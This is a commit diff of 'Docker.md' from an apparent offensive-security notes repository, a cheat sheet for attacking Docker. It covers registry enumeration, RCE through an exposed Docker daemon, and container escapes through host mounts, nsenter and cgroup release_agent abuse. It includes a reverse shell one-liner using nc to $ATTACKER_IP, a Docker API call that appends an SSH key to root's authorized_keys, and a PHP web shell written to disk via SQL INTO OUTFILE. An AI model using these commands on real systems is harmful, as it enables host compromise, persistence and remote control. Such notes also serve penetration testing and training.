whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup

This commit is contained in:
whackx 2023-08-21 15:10:17 +02:00
parent 742e33b85b
commit d0c0ad1ab6
1 changed files with 67 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
Exploits/Containers/Docker.md
View File

@ -3,84 +3,110 @@
## Check if you are inside a container ## Check if you are inside a container
* Low process count * Low process count
```sh ```sh
ps aux ps aux
``` ```
* `.dockerenv` in `/` * `.dockerenv` in `/`
```sh ```sh
cd / && ls -lah cd / && ls -lah
``` ```
* cgroups contain docker names * cgroups contain docker names
```sh ```sh
pwd /proc/1 pwd /proc/1
cat cgroups cat cgroups
``` ```
* [Container enumeration](https://github.com/stealthcopter/deepce) * [Container enumeration](https://github.com/stealthcopter/deepce)
## Abusing Registry ## Abusing Registry
* [Registry Doc](https://docs.docker.com/registry/spec/api/) * [Registry Doc](https://docs.docker.com/registry/spec/api/)
* Registry is a json API endpoint * Registry is a json API endpoint
* Private registry added in `/etc/docker/daemon.json` * Private registry added in `/etc/docker/daemon.json`
* Can be found by nmap as a service * Can be found by nmap as a service
Enumerate the Registry through [DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber.git).
### Enumeration ### Enumeration
* General query * General query
```sh ```sh
curl http://test.com:5000/v2/_catalog` curl http://test.com:5000/v2/_catalog`
``` ```
* List tags * List tags
```sh ```sh
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list curl http://example.com:5000/v2/<REPOSITORY>/<APP>/tags/list
curl http://example.com:5000/v2/<REPOSITORY>/tags/list
``` ```
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
`history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh ```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG> curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
``` ```
## Reversing Docker Images ## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive) * [Dive](https://github.com/wagoodman/dive)
```sh ```sh
dive <IMAGE-ID> dive <IMAGE-ID>
``` ```
## Uploading Images to Registry ## Uploading Images to Registry
* Ever image has a `latest` tag * Ever image has a `latest` tag
* Upload modified docker image as `latest` * Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining) * [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon ## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker * Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker * `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port * Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket * Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps ```sh
docker -H tcp://test.com:2375 exec <container> <cmd> docker -H tcp://test.com:2375 ps
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh docker -H tcp://test.com:2375 exec <container> <cmd>
``` docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease) * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets * Looking for exposed docker sockets
```sh ```sh
find / -name "*sock" 2>/dev/null find / -name "*sock" 2>/dev/null
groups groups
``` ```
* Mount the host volume and chroot to it, need alpine image. * Mount the host volume and chroot to it, need alpine image.
```sh ```sh
docker images docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh docker run -v /:/mnt --rm -it alpine chroot /mnt sh
``` ```
or or
```sh ```sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash docker run -v /:/host --rm -it <imageID> chroot /host/ bash
``` ```
## Shared Namespaces ## Shared Namespaces
* Namespaces * Namespaces
* Cgroups * Cgroups
* OverlayFS * OverlayFS
@ -88,24 +114,28 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
* Requires root inside the container * Requires root inside the container
* Execute command * Execute command
```sh ```sh
nsenter --target 1 --mount sh nsenter --target 1 --mount sh
``` ```
## Misconfiguration ## Misconfiguration
### capabilities ### capabilities
* Privileged container connect to the host directly, not through the docker engine * Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible * Execution of bins on the host from libs inside the container is possible
```sh ```sh
capsh --print capsh --print
``` ```
* `man capabilities` * `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via * Exploit and get a reverse shell to the host via
```sh ```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release echo 1 > /tmp/cgrp/x/notify_on_release
@ -116,17 +146,23 @@ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/
chmod a+x /exploit chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system * The file may appear outside the container on the host system
### cap_admin ### cap_admin
`cap_sys_admin` provides the ability to spawn a root shell inside the container `cap_sys_admin` provides the ability to spawn a root shell inside the container
```sh ```sh
capsh --gid=0 --uid=0 -- capsh --gid=0 --uid=0 --
``` ```
Further, if there is access to the host this capability can be used to set `chmod u+s /bin/bash` and list the available mounts. The mounts can be listed `findmnt`. Further, if there is access to the host this capability can be used to set
Resulting in a useable root bash on the host via executing it on the path of the docker volume, e.g. `chmod u+s /bin/bash` and list the available mounts. The mounts can be listed
`findmnt`.
Resulting in a useable root bash on the host via executing it on the path of
the docker volume, e.g.
```sh ```sh
/var/lib/docker/overlay2/l/randomhash/bin/bash -p /var/lib/docker/overlay2/l/randomhash/bin/bash -p
``` ```
@ -135,10 +171,12 @@ Resulting in a useable root bash on the host via executing it on the path of the
* `fdisk -l` and `lsblk`, host bulk device may be exposed * `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device * Mount the device
```sh ```sh
mkdir /mnt/hostdev mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev mount /dev/<hostVda> /mnt/hostdev
``` ```
* Check `/dev` as well !!! and mount device * Check `/dev` as well !!! and mount device
## Creating a Container from inside another container ## Creating a Container from inside another container
@ -146,20 +184,27 @@ mount /dev/<hostVda> /mnt/hostdev
* Needs root inside a container * Needs root inside a container
* Upload [static curl](https://github.com/moparisthebest/static-curl) * Upload [static curl](https://github.com/moparisthebest/static-curl)
* Check available images and containers * Check available images and containers
```sh ```sh
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
``` ```
* Inside the container as root * Inside the container as root
```sh ```sh
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}' curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
``` ```
* Return value is the ID * Return value is the ID
* Start a container * Start a container
```sh ```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
``` ```
* Login in to the host via ssh remotely or socat locally * Login in to the host via ssh remotely or socat locally
```sh ```sh
socat - UNIX-CONNECT:/var/run/docker.sock socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
@ -180,24 +225,34 @@ Upgrade: tcp
* Inject PHP code * Inject PHP code
* Select table content into a file the user can read * Select table content into a file the user can read
* Execute the file * Execute the file
```sql ```sql
create table h4x0r (pwn varchar(1024)); create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>'); insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php'; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
``` ```
* curl the webshell hon the exploited host * curl the webshell hon the exploited host
```sh ```sh
curl <host-IP>/shell.php?cmd=id curl <host-IP>/shell.php?cmd=id
``` ```
## Dirty c0w ## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
[DirtyC0w](https://github.com/dirtycow/dirtycow.github.io)
## runC ## runC
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) [CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
## Securing a Container ## Securing a Container
* Least Privileges * Least Privileges
* Seccomp * Seccomp
* Securing Registry via TLS * Securing Registry via TLS
## References
* [Docker Registry Grabber](https://github.com/Syzik/DockerRegistryGrabber.git)